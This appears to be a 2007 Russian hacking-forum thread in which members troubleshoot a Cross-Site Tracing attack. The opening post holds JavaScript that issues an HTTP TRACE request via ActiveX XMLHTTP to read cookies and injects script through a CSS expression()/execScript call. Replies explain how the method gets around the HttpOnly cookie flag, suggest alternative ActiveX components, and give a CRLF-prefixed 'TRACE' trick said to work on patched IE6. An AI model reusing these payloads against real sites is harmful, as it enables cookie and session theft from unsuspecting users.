18.08.2007, 05:37
|
|
Новичок
Регистрация: 12.08.2007
Сообщений: 5
С нами:
9866752
Репутация:
0
|
|
Trace атака
Доброго времени суток уважаемые Хакеры!
На одном сайте XSpider написал, что возможно атака с помощью метода TRACE.
в инете нашел такой код
Код:
<script>
function xssDomainTraceRequest(){
var xmlHttp = new ActiveXObject('Microsoft.XMLHTTP');
var exampleCode = xmlHttp;
xmlHttp.open ("TRACE","http://site.ru",false);
xmlHttp.send ();
xmlDoc=xmlHttp.responseText;
alert (xmlDoc);
var target = "http://site.ru";
cExampleCode = encodeURIComponent(exampleCode + ';top.close()');
var readyCode = 'font-size: expression(execScript(decodeURIComponent("' +
cExampleCode + '")))';
showModalDialog(target, null, readyCode);
}
</script>
<INPUT TYPE="BUTTON" OnClick="xssDomainTraceRequest()" VALUE="Show Cookie
Information Using TRACE">
подставляю за место http://site.ru мой сайт.
заливаю к себе на хостинг, жму кнопку и ничего ни в опере, ни в IE не нажимается... Что я делаю не так? Подскажите пожалуйста. |
|
|
18.08.2007, 08:29
|
|
Banned
Регистрация: 29.06.2007
Сообщений: 17
С нами:
9930339
Репутация:
-15
|
|
чушь это все ищи другую дырку
|
|
|
|
18.08.2007, 15:26
|
|
Administrator
Регистрация: 12.10.2006
Сообщений: 466
С нами:
10304966
Репутация:
5170
|
|
Открою страшный "секрет", Trace широко использовался для проведение xss, как метод обход атрибута "HttpOnly". С выходом(если точнее то патч) IE 6 стал доступен атрибут HTTP-only который при обращение к document.cookie возвращал пустую строчку( при попытки запроса к кукам ). Т.е. один из методов "перехвата"/получения данных которые были отосланы при запросе(HTTP-заголовки), Request line>Headers>Post data. По умолчанию метод HTTP TRACE включеным на серверах(отсутствие директивы "TraceEnable off" как таковой).
Пример:
Последний раз редактировалось ettee; 18.08.2007 в 16:45..
|
|
|
|
18.08.2007, 16:32
|
|
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
С нами:
10153766
Репутация:
2565
|
|
Сообщение от Alloc
подставляю за место http://site.ru мой сайт.
заливаю к себе на хостинг, жму кнопку и ничего ни в опере, ни в IE не нажимается... Что я делаю не так? Подскажите пожалуйста.
Что значит не нажимается, включи в броузере яваскрипт - тогда будет нажиматься. Если не работает см. ошибки скрипта, например ИЕ указывает в каких строчках вываливается ошибка.
ЗЫ возможно у тя др. компонента активХ, например попробуй след.
'MSXML2.XMLHTTP.6.0',
'MSXML2.XMLHTTP.5.0',
'MSXML2.XMLHTTP.4.0',
'MSXML2.XMLHTTP.3.0',
'MSXML2.XMLHTTP',
|
|
|
|
16.09.2007, 17:40
|
|
Познающий
Регистрация: 30.12.2006
Сообщений: 32
С нами:
10190624
Репутация:
68
|
|
Перепробовал различные коды, в ошибке постоянно писало "Недопустимый вызов или аргумент процедуры". Может, у кого-нибудь есть работающая страница, отсылающая запрос на какой-нибудь сайт?
|
|
|
|
17.09.2007, 23:38
|
|
Новичок
Регистрация: 13.07.2007
Сообщений: 6
С нами:
9910317
Репутация:
3
|
|
xmlHttp.open ("\r\nTRACE","http://site.ru",false);
Это на ИЕ6 с патчем работает. На ИЕ7 уже нет. На Локалхосте тестил. На внешке пробовал - по-началу работало, потом ИЕ стал просто зависать.  Так и не понял, почему, но, видимо, сервер просто перестал отвечать. |
|
|
|
|
 |
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
streSS teSt Firewall'ов
|
Elekt |
Защита ОС: вирусы, антивирусы, файрволы. |
22 |
27.03.2009 19:43 |
|
Атака Helkern
|
Mertvii-Listopad |
Защита ОС: вирусы, антивирусы, файрволы. |
3 |
19.03.2006 05:20 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [53x]Shadow](/avatars/avatar32248.jpg?439842){kind=avatar}
Комбинированный вид
